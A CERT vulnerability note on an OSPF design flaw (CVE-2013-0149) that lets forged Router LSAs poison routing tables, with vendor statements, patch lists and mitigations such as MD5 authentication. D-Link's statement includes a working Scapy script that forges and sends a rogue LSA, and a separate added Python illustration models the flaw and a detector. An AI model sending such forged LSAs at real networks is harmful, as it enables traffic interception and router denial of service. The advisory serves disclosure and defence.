Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers

2013-08-02T00:00:00
ID VU:229804
Type cert
Reporter CERT
Modified 2013-12-06T18:59:00

Description

Overview

The Open Shortest Path First (OSPF) protocol does not specify unique Link State Advertisement (LSA) lookup identifiers, which can allow an attacker to intercept traffic or conduct a Denial of Service (DoS) attack.

Description

CWE-694: Use of Multiple Resources with a Duplicate Identifier

The OSPF protocol requires LSAs to be identified by three fields: LS Type, Advertising Router, and Link State ID. However, during the routing table calculation phase, the specification states that an LSA is queried in the LSA database
using only the Link State ID. Since the Link State ID alone is used in the LSA database to identify a particular router, a duplicate entry with the same Link State ID but a different Advertising Router can cause unexpected and insecure implementation-specific behavior.

In some implementations, the vulnerability can allow an attacker to subvert the routing table of a victim router by sending false link state advertisements on behalf of other routers. This subversion can cause the victim router
to drop the entire table (denial of service) or to re-route traffic on the network.
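The lookup ambiguity described above, as an added illustration that is not part of the CERT note or of any vendor's code: a toy link-state database that resolves a router by Link State ID alone, beside a hardened variant that enforces the Router-LSA invariant (Link State ID equals Advertising Router) and keys the SPF lookup on the full identifier. The addresses, LSAs and the `AmbiguousLSDB`/`StrictLSDB` classes are constructed sample data and a simplified model, not a real implementation.

```python
"""
Toy OSPF link-state database contrasting the ambiguous Router-LSA lookup
described in VU#229804 with a hardened one.  RFC 2328 keys an LSA by
(LS Type, Link State ID, Advertising Router), but the routing-table
calculation looks a router up by Link State ID alone.  For a Router-LSA
(type 1) the Link State ID is the originating router's Router ID, which is
also its Advertising Router field; a rogue LSA that breaks this invariant
can shadow the legitimate one.  All addresses and LSAs are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

ROUTER_LSA = 1


@dataclass(frozen=True)
class LSA:
    ls_type: int
    link_state_id: str
    adv_router: str
    seq: int
    links: Tuple[str, ...] = ()  # simplified: only the Link IDs advertised


class AmbiguousLSDB:
    """Stores LSAs under the full RFC 2328 key but, as the note describes,
    resolves a router by Link State ID only during SPF.  The last LSA
    installed for a given Link State ID wins, whoever advertised it."""

    def __init__(self) -> None:
        self.db: Dict[Tuple[int, str, str], LSA] = {}
        self.by_lsid: Dict[str, LSA] = {}

    def install(self, lsa: LSA) -> bool:
        key = (lsa.ls_type, lsa.link_state_id, lsa.adv_router)
        old = self.db.get(key)
        if old is not None and old.seq >= lsa.seq:
            return False  # not newer than the stored instance: ignored
        self.db[key] = lsa
        self.by_lsid[lsa.link_state_id] = lsa  # the ambiguous index
        return True

    def router_lsa_for_spf(self, router_id: str) -> Optional[LSA]:
        return self.by_lsid.get(router_id)


def router_lsa_is_consistent(lsa: LSA) -> bool:
    """A Router-LSA's Link State ID is the originating router's Router ID,
    so it must equal the Advertising Router field (RFC 2328, section 12.1.4).
    The originating router's "fight back" only fires for LSAs carrying its own
    Advertising Router, which is why a mismatching rogue LSA goes unanswered."""
    return lsa.ls_type != ROUTER_LSA or lsa.link_state_id == lsa.adv_router


class StrictLSDB(AmbiguousLSDB):
    """Hardened variant: an inconsistent Router-LSA is rejected at reception,
    and SPF resolves a router by the full key, so a rogue entry can never
    shadow the genuine one."""

    def install(self, lsa: LSA) -> bool:
        if not router_lsa_is_consistent(lsa):
            return False
        return super().install(lsa)

    def router_lsa_for_spf(self, router_id: str) -> Optional[LSA]:
        return self.db.get((ROUTER_LSA, router_id, router_id))


def find_rogue_router_lsas(lsas: List[LSA]) -> List[LSA]:
    """Detection helper: flag Router-LSAs violating the invariant, e.g. when
    run over LSAs decoded from a capture of the OSPF segment."""
    return [lsa for lsa in lsas if not router_lsa_is_consistent(lsa)]


# Constructed scenario: the victim's genuine Router-LSA, then a rogue one
# reusing the victim's Router ID as Link State ID but advertised by another
# router with a higher sequence number.
VICTIM = "192.168.37.3"
GENUINE = LSA(ROUTER_LSA, VICTIM, VICTIM, 0x80000003,
              ("192.168.37.7", "192.168.13.3"))
ROGUE = LSA(ROUTER_LSA, VICTIM, "192.168.27.11", 0x80000004,
            ("192.168.50.0",))


def run_scenario(db: AmbiguousLSDB) -> Tuple[bool, bool, Optional[str]]:
    """Returns (genuine installed, rogue installed, Advertising Router of the
    LSA that SPF ends up using for the victim)."""
    ok_genuine = db.install(GENUINE)
    ok_rogue = db.install(ROGUE)
    chosen = db.router_lsa_for_spf(VICTIM)
    return ok_genuine, ok_rogue, None if chosen is None else chosen.adv_router


if __name__ == "__main__":
    print("ambiguous lookup:", run_scenario(AmbiguousLSDB()))
    print("strict lookup:   ", run_scenario(StrictLSDB()))
    print("flagged:", find_rogue_router_lsas([GENUINE, ROGUE]))
```

With the ambiguous lookup the rogue LSA is installed as a distinct database entry yet is the one SPF returns for the victim; the strict variant rejects it and still returns the genuine LSA.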


Impact

This vulnerability can allow an attacker to re-route traffic, compromising the confidentiality of the data, or to conduct a denial-of-service attack against a router, dropping all traffic.


Solution

Install Updates
The OSPF protocol is a popular interior routing protocol that is used by many devices and manufacturers. This vulnerability is implementation-specific, so some vendors may not be affected. The list below contains known affected or non-affected vendors. Please consult your network equipment vendor to confirm how they are affected by this vulnerability.


Vendor Information


Brocade Affected

Notified: June 13, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165-A SEVERITY: Low – Informational

PRODUCTS AFFECTED:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See <http://nvd.nist.gov/home.cfm> for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black holes, etc.
The attacker can cause attacks through a crafted illegal OSPF Router LSA (type-1) where the Link State
ID and Router ID in the LSA are not the same, leading to corruption of the routing table in the routers.
The crafted Router LSA must come from the source IP of an OSPF peer (in other words, spoofing a
legitimate OSPF peer), or the Router LSA is sent on an interface where an OSPF peer already
exists.

WORKAROUND
There is no workaround. However, if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication.
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See <http://My.Brocade.com> for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
• Brocade MLX Series
• Brocade NetIron XMR Series
• Brocade NetIron CER Series
• Brocade NetIron CES Series

SW Releases with problem resolved
• NetIron 05.2.00k and later
• NetIron 05.3.00f and later
• NetIron 05.4.00e and later
• NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
• Brocade VDX Series

SW Releases with problem resolved
• Network OS 3.0.1c and later
• Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
• Brocade FastIron Series
• Brocade ICX Series
• Brocade TurboIron Series

SW Releases with problem resolved
• FastIron 7.2.02k and later
• FastIron 7.3.00g and later
• FastIron 07.4.00d and later
• FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
• Brocade BigIron RX Series

SW Releases with problem resolved
• BigIron RX 2.7.02p and later
• BigIron RX 02.8.00f and later
• BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
• Brocade ADX Series and JetCore Series

SW Releases with problem resolved
• ServerIron JetCore 10.2.02d
• ServerIron JetCore 11.0.00k
• ServerIron ADX 12.3.01k
• ServerIron ADX 12.4.00k
• ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
• Brocade Vyatta vRouter

For customers running on Amazon Web Services this problem has been resolved.
SW Releases with problem resolved
• Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Check Point Software Technologies Affected

Notified: May 28, 2013 Updated: October 16, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Cisco Systems, Inc. Affected

Notified: May 22, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

Cisco has provided patches for this vulnerability, please check the URL below for details.

Vendor References

  • <http://tools.cisco.com/security/center/viewAlert.x?alertId=30210>

D-Link Systems, Inc. Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

1. Advisory Information

Title: Open Shortest Path First (OSPF) Protocol does not specify unique LSA lookup identifiers
D-Link ID: DLINK-2013-VUL0213
Advisory URL: TBD prior to Aug. 1, 2013
Date published: August 1, 2013
Date of last update: 7/29/13 (will update on saving document)
Reported by: CERT
Release mode: Coordinated Release

2. Vulnerability Information
Class: CWE-694
Impact: Critical
Remotely Exploitable: Possible, but would require access via other product(s)
Locally Exploitable: Yes
CVE Name: CVE-2013-0149
3. Vulnerability Description
The Open Shortest Path First (OSPF) protocol does not specify unique Link State
Advertisement (LSA) lookup identifiers, which allow an attacker to intercept traffic or
conduct a Denial of Service (DoS) attack.

This vulnerability can allow an attacker to re-route traffic through their own router,
compromising the confidentiality of the data, or to conduct a Denial of Service attack
against a router, dropping all traffic.

4. Vulnerable Packages
The following is the list of known affected devices and the associated firmware
(confirmed by D-Link). This will be updated as needed if additional units are affected.
1. DES-3810-28 – R2.20.B017 (HW Not available in the US)

5. Vendor Information, Solutions and Workarounds
D-Link distributes a number of devices which could potentially be affected by this
vulnerability; chiefly, any L3 managed switch that supports OSPF has the possibility of
being subject to this attack.

D-Link is working to reduce the potential impact of this vulnerability, which is a result of
an ambiguous standard. Currently we advise the following:

As always, adhering to best practices will be the strongest defense against attacks. As
long as your physical devices, networks, and protocols are secured, it will be very
difficult for an attacker to insert a rogue LSA to initiate this type of attack.

First, this vulnerability does not defeat cryptographic (MD5) authentication, we
recommend a strong MD5 authentication key as your best defense.
We also recommend that administrators enable the OSPF passive interface feature to
stop sending or receiving routing table updates on interfaces that do not participate in
OSPF.

Finally, we recommend that networks use MAC-based Access Control (MAC) to
authenticate devices before they are able to communicate with the network. The MAC
feature is a client-less design so there is no need to install extra software on a user’s
computer, and ensures that only devices on a whitelist will have access to the network.
When used in conjunction with common security best practices, it can help to strongly
limit the possible vectors of attack.

D-Link is monitoring the situation for an update to the standard that can be implemented
to protect potentially affected devices.

6. Credits
Dr. Gabi Nakibly - NEWRSC, Rafael - Advanced Defense Systems Ltd.
Eitan Menahem - Telekom Innovation Laboratories, Ben Gurion University
Ariel Waizel - Telekom Innovation Laboratories, Ben Gurion University
Prof. Yuval Elovici - Telekom Innovation Laboratories, Ben Gurion University
The publication of this advisory was not coordinated with the aforementioned

7. Technical Description / Proof of Concept Code

7.1. OSPF “Fight Back” is triggered by LSAs with matching Router ID only, and so can
be evaded by using non-matching Router ID and Link State ID on a rogue LSA. Routing
lookup uses only the Link State ID field, and so may, depending on implementation,
result in selecting the rogue LSA before the valid LSA.

Scapy proof-of-concept attack script

from scapy.all import IP, send
from scapy.contrib.ospf import OSPF_Hdr, OSPF_LSUpd, OSPF_Router_LSA, OSPF_Link

attacker_source_ip = "192.168.13.1"
attacker_router_id = "192.168.18.1"
victim_destination_ip = "192.168.13.3"
victim_router_id = "192.168.37.3"
false_adv_router = "192.168.27.11"
seq_num = 0x80000004  # Python 2 "L" long-integer suffix dropped; valid on Python 2 and 3
# Router LSA (type 1) whose Link State ID is the victim's Router ID while the
# Advertising Router is a different router: the mismatch described in 7.1.
R3_FALSE_LSA = IP(src=attacker_source_ip, dst=victim_destination_ip) \
    /OSPF_Hdr(src=attacker_router_id) \
    /OSPF_LSUpd(lsalist=[
        OSPF_Router_LSA(options=0x22, type=1, id=victim_router_id, adrouter=false_adv_router,
                        seq=seq_num, linklist=[
            OSPF_Link(id="192.168.37.7", data="192.168.37.3", type=2, metric=1),
            OSPF_Link(id="192.168.13.3", data="192.168.13.3", type=2, metric=1),
            OSPF_Link(id="192.168.50.0", data="255.255.255.0", type=3, metric=3)
        ])
    ])
send(R3_FALSE_LSA, iface="eth0")

8. Report Timeline
• May 28, 2013 – Notification by Cert of the issue
• May 28, 2013 – Notify Qualified D-Link Resources of issue
• June 6, 2013 – Cert notified embargo date changed to July 30
• Jun 6, 2013 – D-Link Request Cert to resend details
• June 11, 2013 – D-Link receives details
• July 29, 2013 – Cert notified embargo date changed to Aug 1
• July 29, 2013 – D-Link Sends Vulnerability Response Report to Cert
• July 30, 2013 – D-Link Post Report for affected Products

9. References
[1] CVE-229804-2013.pdf – Owning the Routing Table Part II

10. About D-Link
D-Link is the global leader in connectivity for home, small business, mid- to large-sized enterprise
environments, and service providers. An award-winning designer, developer, and manufacturer, D-Link
implements and supports unified network solutions that integrate capabilities in switching, wireless,
broadband, storage, IP Surveillance, and cloud-based network management. For more information visit
www.dlink.com, or connect with D-Link on Facebook (www.facebook.com/dlink) and Twitter
(www.twitter.com/dlink).

11. Disclaimer
D-Link and the D-Link logo are trademarks or registered trademarks of D-Link Corporation or its
subsidiaries. All other third-party marks mentioned herein may be trademarks of their respective owners.
Copyright © 2013. D-Link. All Rights Reserved.

References

Authors:
Patrick Cline - Patrick.Cline@dlink.com
William Brown – William.Brown@dlink.com

Vendor Information

Please see DLINK-2013-VUL0213.

Enterasys Networks Affected

Notified: May 28, 2013 Updated: August 19, 2013

Status

Affected

Vendor Statement

Product Advisory Note - https://cp-enterasys.kb.net/article.aspx?article=15134&p=1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Extreme Networks Affected

Notified: May 28, 2013 Updated: July 30, 2013

Status

Affected

Vendor Statement

Extreme Networks' EXOS implementation of OSPF is susceptible to the vulnerability reported in VU#229804.

This vulnerability will be fixed in a future EXOS release.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

IBM Corporation Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

IBM has provided updates for multiple products, please check the URLs below for details.

Vendor References

  • <http://www-912.ibm.com/systems/electronic/support/s_dir/slkbase.nsf/docNumber/677961906>
  • <http://www-01.ibm.com/support/docview.wss?uid=isg3T1019716>

Juniper Networks, Inc. Affected

Notified: May 10, 2013 Updated: December 03, 2013

Status

Affected

Vendor Statement

LEGACY ADVISORY ID:

PSN-2013-08-987

PRODUCT AFFECTED:
All Juniper Networks platforms running Junos Operating System software, JunosE Operating System software, and ScreenOS software

PROBLEM:
A vulnerability has been discovered in the OSPF (Open Shortest Path First) protocol that allows a remote attacker to insert, update, or delete routes in the OSPF database. Juniper has worked to provide fixes for all supported code that is vulnerable to this issue.

The issue lies in the OSPF protocol (RFC 2328: <http://www.rfc-editor.org/rfc/rfc2328.txt>). OSPF does not specify that the 'Link State ID' and 'Advertising Router' fields need to match when a router receives an OSPF link-state advertisement (LSA). This limitation of the protocol specification would allow for an attacker to inject false routes into the OSPF database. This issue doesn't exist if the OSPF configuration of a router is set to use MD5 Authentication, or if a filter is used to block external parties from sending OSPF link-state update (LSU) packets. This issue also does not apply to passive OSPF interfaces or interfaces that are not configured for OSPF.

This issue was discovered by an external security researcher.

No other Juniper Networks products or platforms are affected by this issue.

This issue has been assigned CVE-2013-0149.

SOLUTION:
Releases containing (or will contain) the fix specifically include: 13.1R3, 13.2X50-D10, 12.3R3, 12.2R5, 12.1R7, 12.1X45-D10, 12.1X44-D15, 11.4R8, 10.4R15, and all subsequent releases. In addition, all Junos OS software releases built on or after 2013-07-25 will also have fixed this specific issue.

Customers can confirm the build date of any Junos OS release by issuing the command 'show version detail'.

All JunosE software releases built on or after 2013-07-25 have fixed this specific issue. Please contact JTAC to request a patch or hotfix for fixes on all other supported releases of code.

Software updates to ScreenOS have been released to resolve this issue. Releases containing the fix include ScreenOS 5.4.0r28a, 6.2.0r17a, and 6.3.0r14a.

This issue is being tracked as PR 878639 (Junos), CQ95773 (JunosE), and PR 895456 (ScreenOS).

KB16765 - "In which releases are vulnerabilities fixed?" describes which release vulnerabilities are fixed as per our End of Engineering and End of Life support policies.

WORKAROUND:
Juniper recommends that customers use MD5 authentication when configuring OSPF. MD5 authentication completely mitigates this issue as the router will not accept an LSA without the correct MD5 auth value.

It is good security practice to limit the exploitable attack surface of critical infrastructure networking equipment. Use access lists or firewall filters on physical interfaces (not loopback) to limit access to the router via OSPF unless necessary.

Customers who need a hotfix for this issue on JunosE may request one by contacting JTAC.
IMPLEMENTATION:

RELATED LINKS:
KB16613: Overview of the Juniper Networks SIRT Monthly Security Bulletin Publication Process
KB16765: In which releases are vulnerabilities fixed?
KB16446: Common Vulnerability Scoring System (CVSS) and Juniper's Security Advisories.
Report a Vulnerability - How to Contact the Juniper Networks Security Incident Response Team
CVE-2013-0149

CVSS SCORE:
7.8 (AV:N/AC:M/Au:N/C:N/I:P/A:C)

RISK LEVEL:
High

RISK ASSESSMENT:
This issue could allow a remote attacker to modify an OSPF database. For the issue to take place the attacker would need to have unfiltered access to an OSPF interface that is not using MD5 authentication. The attacker would be able to add routes, overwrite routes, and also clear the OSPF database. This attack could potentially allow an attacker to cause a denial of service or reroute traffic.

ACKNOWLEDGEMENTS:
Juniper SIRT would like to acknowledge and thank Gabi Nakibly for responsibly reporting this vulnerability to CERT/CC who coordinated the multi-vendor response.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

NEC Corporation Affected

Notified: May 28, 2013 Updated: September 10, 2013

Status

Affected

Vendor Statement

We provide information on this issue at the following URL: <http://jpn.nec.com/security-info/secinfo/nv13-006.html> (only in Japanese)

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

  • <http://jpn.nec.com/security-info/secinfo/nv13-006.html>

Oracle Corporation Affected

Notified: May 28, 2013 Updated: October 16, 2013

Status

Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

Affected products include: Oracle Sun Blade 6000 10GBE switched NEM 1.2, Sun Network 10GBE Switch 72P 1.2, Oracle Switch ES1-24 1.3. A patch is available at the following link.

Vendor References

  • <http://www.oracle.com/technetwork/topics/security/cpuoct2013-1899837.html>

Vyatta Affected

Notified: May 10, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

TECHNICAL SUPPORT BULLETIN

July 25, 2013

TSB 2013-165-A SEVERITY: Low – Informational

PRODUCTS AFFECTED:
Brocade MLX Series running NetIron SW
Brocade NetIron XMR Series running NetIron SW
Brocade NetIron CER Series running NetIron SW
Brocade NetIron CES Series running NetIron SW
Brocade VDX Series running Network OS 3.x and later SW
Brocade FastIron Series running FastIron SW
Brocade ICX Series running FastIron SW
Brocade TurboIron Series running FastIron or TurboIron SW
Brocade BigIron RX Series running BigIron RX SW
Brocade ADX Series and JetCore Series running ServerIron SW
Brocade Vyatta vRouter
CORRECTED IN RELEASE:
See list of releases below.

BULLETIN OVERVIEW
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability has a CVSS score of 9.3 and is documented in the National Vulnerability Database as
CVE-2013-0149. See <http://nvd.nist.gov/home.cfm> for details.

Brocade produces and publishes Technical Support Bulletins to OEMs, partners and customers that
have a direct, entitled, support relationship in place with Brocade

Please contact your primary service provider for further information regarding this topic and
applicability for your environment.

PROBLEM STATEMENT
A security vulnerability, US-CERT Ref VU#229804, has been identified in the OSPF protocol. This
vulnerability requires that the attacker already controls a router within the AS.

RISK ASSESSMENT
The listed products are exposed to this vulnerability in the OSPF protocol, where the attacker already
has control of a router in the AS. This vulnerability has a CVSS score of 9.3.

SYMPTOMS
An attacker who has gained control of a router within a given AS can arbitrarily poison the routing
tables of all other routers in the AS. This can facilitate traffic subversion, black holes, etc.
The attacker can cause attacks through a crafted illegal OSPF Router LSA (type-1) where the Link State
ID and Router ID in the LSA are not the same, leading to corruption of the routing table in the routers.
The crafted Router LSA must come from the source IP of an OSPF peer (in other words, spoofing a
legitimate OSPF peer), or the Router LSA is sent on an interface where an OSPF peer already
exists.

WORKAROUND
There is no workaround. However, if users can physically secure their network/routers, the chance of
this attack is quite low.
The recommendations are:
a) Physically secure the access to network routers, and links between routers.
b) Only allow passive OSPF protocols on interfaces with user/host connections (i.e. leaf
interfaces).
c) Enable OSPF MD5 authentication.
This is not considered completely secure, but it should make the attack more difficult.

CORRECTIVE ACTION
See <http://My.Brocade.com> for the appropriate SW release(s) as listed below, please contact your
account team or Brocade Support if you have further questions.

Affected Products:
• Brocade MLX Series
• Brocade NetIron XMR Series
• Brocade NetIron CER Series
• Brocade NetIron CES Series

SW Releases with problem resolved
• NetIron 05.2.00k and later
• NetIron 05.3.00f and later
• NetIron 05.4.00e and later
• NetIron 05.5.00d and later
Reference Defect ID: 468326

Affected Products:
• Brocade VDX Series

SW Releases with problem resolved
• Network OS 3.0.1c and later
• Network OS 4.0.0a and later
Reference Defect ID: 466022

Affected Products:
• Brocade FastIron Series
• Brocade ICX Series
• Brocade TurboIron Series

SW Releases with problem resolved
• FastIron 7.2.02k and later
• FastIron 7.3.00g and later
• FastIron 07.4.00d and later
• FastIron 08.0.00b and later
Reference Defect ID: 466801

Affected Products:
• Brocade BigIron RX Series

SW Releases with problem resolved
• BigIron RX 2.7.02p and later
• BigIron RX 02.8.00f and later
• BigIron RX 02.9.00c and later
Reference Defect ID: 468497

Affected Products:
• Brocade ADX Series and JetCore Series

SW Releases with problem resolved
• ServerIron JetCore 10.2.02d
• ServerIron JetCore 11.0.00k
• ServerIron ADX 12.3.01k
• ServerIron ADX 12.4.00k
• ServerIron ADX 12.5.01a
Reference Defect ID (ADX): 469347
Reference Defect ID (JetCore): 111372

Affected Products:
• Brocade Vyatta vRouter

For customers running on Amazon Web Services this problem has been resolved.
SW Releases with problem resolved
• Brocade Vyatta vRouter 6.6R1

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Yamaha Corporation Affected

Notified: May 28, 2013 Updated: August 05, 2013

Status

Affected

Vendor Statement

Yamaha Corporation provides information on this issue at the following URL (Japanese only):

<http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html>

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

  • <http://www.rtpro.yamaha.co.jp/RT/FAQ/Security/VU96465452.html>

ACME Packet Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Buffalo Inc Not Affected

Notified: May 30, 2013 Updated: September 12, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Fortinet, Inc. Not Affected

Notified: May 28, 2013 Updated: August 19, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

FreeBSD Project Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Global Technology Associates, Inc. Not Affected

Notified: May 28, 2013 Updated: July 30, 2013

Statement Date: July 30, 2013

Status

Not Affected

Vendor Statement

GTA's GB-OS based firewalls are not affected by this (VU#229804 - OSPF) vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Hitachi Not Affected

Notified: May 28, 2013 Updated: July 31, 2013

Status

Not Affected

Vendor Statement

Hitachi Information for VU#229804

AlaxalA AX series
(AX8600R/AX6000S/AX3800S/AX3600S/AX2500S/AX2200S/AX1200S/AX7800S/AX7800R)
are not vulnerable to this issue.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Huawei Technologies Not Affected

Notified: May 10, 2013 Updated: August 22, 2013

Status

Not Affected

Vendor Statement

Huawei network devices are not affected by this (VU#229804 - OSPF) vulnerability.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Intel Corporation Not Affected

Notified: May 22, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

McAfee Not Affected

Notified: May 28, 2013 Updated: October 16, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Vendor References

Palo Alto Networks Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Quagga Not Affected

Notified: May 23, 2013 Updated: August 05, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Addendum

Quagga is not affected by this vulnerability but the vendor has provided a patch to prevent rebroadcasting of malformed LSAs.

If you have feedback, comments, or additional information about this vulnerability, please send us email.

VMware Not Affected

Notified: May 28, 2013 Updated: July 18, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

Watchguard Technologies, Inc. Not Affected

Notified: May 28, 2013 Updated: August 06, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

eSoft, Inc. Not Affected

Notified: May 28, 2013 Updated: July 30, 2013

Status

Not Affected

Vendor Statement

We have not received a statement from the vendor.

Vendor Information

We are not aware of further vendor information regarding this vulnerability.

ACCESS Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

AT&T Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Alcatel-Lucent Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Apple Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Avaya, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Barracuda Networks Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Belkin, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Blue Coat Systems Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Borderware Technologies Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

CA Technologies Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Charlotte's Web Networks Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Computer Emergency Response Team Australia Unknown

Notified: May 30, 2013 Updated: May 30, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Conectiva Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Cray Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Debian GNU/Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Dell Computer Corporation, Inc. Unknown

Notified: May 10, 2013 Updated: May 10, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

DragonFly BSD Project Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

EMC Corporation Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Engarde Secure Linux Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Ericsson Unknown

Notified: June 06, 2013 Updated: June 06, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

F5 Networks, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Fedora Project Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Force10 Networks, Inc. Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

Vendor References

Fujitsu Unknown

Notified: May 28, 2013 Updated: May 28, 2013

Status

Unknown

Vendor Statement

We have not received a statement from the vendor.

